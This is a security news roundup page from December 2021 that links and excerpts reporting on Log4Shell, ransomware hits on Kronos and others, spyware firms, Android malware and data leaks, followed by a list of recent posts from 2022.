December 17, 2021

Fortify Security Team
Dec 17, 2021

Title: Forcepoint Security News: Log4Shell Vulnerability, Pfizer Trade Secrets Exfiltration, Classifieds Site Leaked Personal Info via the F12 Key, and Hive Ransomware Enters Big League
Date Published: December 17, 2021

https://www.forcepoint.com/blog/x-labs/news-log4shell-pfizer-data-breach-hive-ransomware-gang

Excerpt: “The recently discovered Log4Shell vulnerability in the popular open source Log4j logging software lets an attacker gain access to a vulnerable system by sending a specially crafted text string to the system. That text string eventually gets logged by Log4j but is also interpreted as code to execute. This in turn is used to download malware and execute malware that can run cryptocurrency mining software, release sensitive data, be part of a DDoS attack on other systems, or execute ransomware. The exploit was first seen on sites hosting Minecraft servers, which discovered that attackers could trigger the vulnerability by posting chat messages.

Title: Sainsbury’s Payroll Hit by Kronos Attack
Date Published: December 17, 2021

https://www.bbc.com/news/technology-59683889

Excerpt: “A UKG official told BBC News: “UKG recently became aware of a ransomware incident that has disrupted the Kronos Private Cloud, which houses solutions used by a limited number of our customers.” It had taken immediate action to investigate and mitigate the issue, alerted affected customers and informed the authorities “We recognise the seriousness of the issue and have mobilised all available resources to support our customers and are working diligently to restore the affected services,” UKG added.”

Title: Facebook Exposes Mercenary Spy Firms That Targeted 50,000 People
Date Published: December 17, 2021

https://www.reuters.com/technology/facebook-exposes-mercenary-spy-firms-that-targeted-48000-people-2021-12-16/

Excerpt: “The company’s fight with the spy firms comes amid a wider move by American tech companies, U.S. lawmakers and President Joe Biden’s administration against purveyors of digital espionage services, notably the Israeli spyware company NSO Group, which was blacklisted earlier this month following weeks of revelations about how its technology was being deployed against civil society. Meta is already suing NSO in a U.S. court. Nathaniel Gleicher, Meta’s head of security policy, told Reuters that Thursday’s crackdown was meant to signal that “the surveillance-for-hire industry is much broader than one company”.”

Title: Backdoor Gives Hackers Complete Control over Federal Agency Network
Date Published: December 16, 2021

https://arstechnica.com/information-technology/2021/12/us-federal-agency-fails-to-respond-to-reports-it-has-been-backdoored/

Excerpt: “The backdoor works by replacing a normal Windows file named oci.dll with two malicious ones—one early in the attack and the other later on. The first imposter file implements WinDivert, a legitimate tool for capturing, modifying, or dropping network packets sent to or from the Windows network stack. The file allows the attackers to download and run malicious code on the infected system. Avast suspects the main purpose of the downloader is to bypass firewalls and network monitoring.”

Title: Google Unleashes Security ‘Fuzzer’ on log4shell Bug in Open-Source Software
Date Published: December 17, 2021

https://www.zdnet.com/article/google-unleashes-security-fuzzer-on-log4shell-bug-in-open-source-software/

Excerpt: “Log4j 2.16.0 disables access to JNDI by default and limits the default protocols to Java, LDAP and LDAPS. Disabling JNDI was previously a manual step to mitigate attacks against the original flaw. Most efforts are now focussed on vendors updating Log4j in their products and end-user organisations applying updates as they become available. For example, the US Cybersecurity and Infrastructure Security Agency (CISA) has given federal agencies until 24 December to identify all applications affected by Log4Shell. Cisco, VMware, IBM and Oracle are busy developing patches for their affected products.”

Title: Android Malware Warning: Over 500,000 Users Have Been Infected after Downloading This App from Google Play
Date Published: December 17, 2021

https://www.zdnet.com/article/over-half-a-million-users-been-infected-with-joker-malware-after-downloading-this-android-app-from-google-play/

Excerpt: “Once installed, the malware does three things: it simulates clicks in order to generate revenue from malicious ads; subscribes users to unwanted paid premium services to steal money and commit billing fraud; and accesses users’ contact lists and sends the information to attackers. Researchers suggest there’s evidence that stolen information is sent to servers hosted in Russia. Negative reviews of the app on the Play Store suggest that some users have noticed the unauthorised behaviour, with complaints about being charged for services they didn’t request access to.”

Title: Gumtree Classifieds Site Leaked Personal Info via the F12 Key
Date Published: December 16, 2021

https://www.bleepingcomputer.com/news/security/gumtree-classifieds-site-leaked-personal-info-via-the-f12-key/

Excerpt: “The consequences of having such data exposed are significant, as the leaked users could be targeted by phishing or social engineering attacks that use this information to try and harvest more sensitive information. The site also features an API exclusively used by the Gumtree app on iOS. Unfortunately, one of that API’s endpoints was vulnerable to an IDOR (insecure direct object references) attack, resulting in another leak of full names and other account info.”

Title: This Company Was Hit With Ransomware, but Didn’t Have to Pay Up. Here’s How They Did It
Date Published: December 17, 2021

https://www.zdnet.com/article/this-company-was-hit-with-ransomware-but-didnt-have-to-pay-up-heres-how-they-did-it/

Excerpt: “”I was pretty confident about the data side of things – we use Rubrik. We make sure it’s got multi-factor authentication (MFA) on it and doesn’t have any shared credentials, so it’s a walled garden,” says Day. “These people immediately want to go after your backups because that ratchets up pressure, so if they can’t get to your backups, you’re in a good place.” But this didn’t stop the cyber criminals from attempting to extort a ransom payment – they emailed all the staff at Langs, claiming they’d stolen data and threatened to sell it on the dark web if a payment wasn’t received by a particular date.”

Title: New Pseudomanuscrypt Malware Infected over 35,000 Computers in 2021
Date Published: December 17, 2021

https://thehackernews.com/2021/12/new-pseudomanuscrypt-malware-infected.html

Excerpt: “The name comes from its similarities to the Manuscrypt malware, which is part of the Lazarus APT group’s attack toolset, Kaspersky researchers said, characterizing the operation as a “mass-scale spyware attack campaign.” The Russian cybersecurity company said it first detected the series of intrusions in June 2021. At least 7.2% of all computers attacked by the malware are part of industrial control systems (ICS) used by organizations in engineering, building automation, energy, manufacturing, construction, utilities, and water management sectors that are located mainly in India, Vietnam, and Russia. Approximately a third (29.4%) of non-ICS computers are situated in Russia (10.1%), India (10%), and Brazil (9.3%).”

Title: NSW Government Casual Recruiter Suffers Ransomware Hit
Date Published: December 16, 2021

https://www.zdnet.com/article/nsw-government-casual-recruiter-suffers-ransomware-hit/

Excerpt: “IT recruitment firm Finite Recruitment has confirmed it experienced a cyber incident in October, which resulted in a “small subset” of the company’s data being downloaded and published on the dark web. The Finite Group incident response team confirmed with ZDNet that when the incident occurred, business operations were not disrupted. “Our security monitoring systems identified and closed down the threat quickly,” they said. “Since then, remedial works have been undertaken and the business has been fully operational”.”

Recent Posts

September 16, 2022

Title: Uber hacked, internal systems breached and vulnerability reports stolen Date Published: September 16, 2022 https://www.bleepingcomputer.com/news/security/uber-hacked-internal-systems-breached-and-vulnerability-reports-stolen/ Excerpt: “Uber suffered a...

September 15, 2022

Title: Webworm hackers modify old malware in new attacks to evade attribution Date Published: September 15, 2022 https://www.bleepingcomputer.com/news/security/webworm-hackers-modify-old-malware-in-new-attacks-to-evade-attribution/ Excerpt: “The Chinese 'Webworm'...

September 14, 2022

Title: Chinese hackers create Linux version of the SideWalk Windows malware Date Published: September 14, 2022 https://www.bleepingcomputer.com/news/security/chinese-hackers-create-linux-version-of-the-sidewalk-windows-malware/ Excerpt: “State-backed Chinese hackers...

September 13, 2022

Title: Cyberspies drop new infostealer malware on govt networks in Asia Date Published: September 13, 2022 https://www.bleepingcomputer.com/news/security/cyberspies-drop-new-infostealer-malware-on-govt-networks-in-asia/ Excerpt: “Security researchers have identified...

September 12, 2022

Title: Cisco confirms Yanluowang ransomware leaked stolen company data Date Published: September 12, 2022 https://www.bleepingcomputer.com/news/security/cisco-confirms-yanluowang-ransomware-leaked-stolen-company-data/ Excerpt: “Cisco has confirmed that the data leaked...

September 9, 2022

Title: Bumblebee Malware Adds Post-exploitation Tool for Stealthy Infections Date Published: September 8, 2022 https://www.bleepingcomputer.com/news/security/bumblebee-malware-adds-post-exploitation-tool-for-stealthy-infections/ Excerpt: “A new version of the...

September 8, 2022

Title: North Korean Lazarus Hackers Take Aim at U.S. Energy Providers Date Published: September 8, 2022 https://www.bleepingcomputer.com/news/security/north-korean-lazarus-hackers-take-aim-at-us-energy-providers/ Excerpt: “The North Korean APT group 'Lazarus' (APT38)...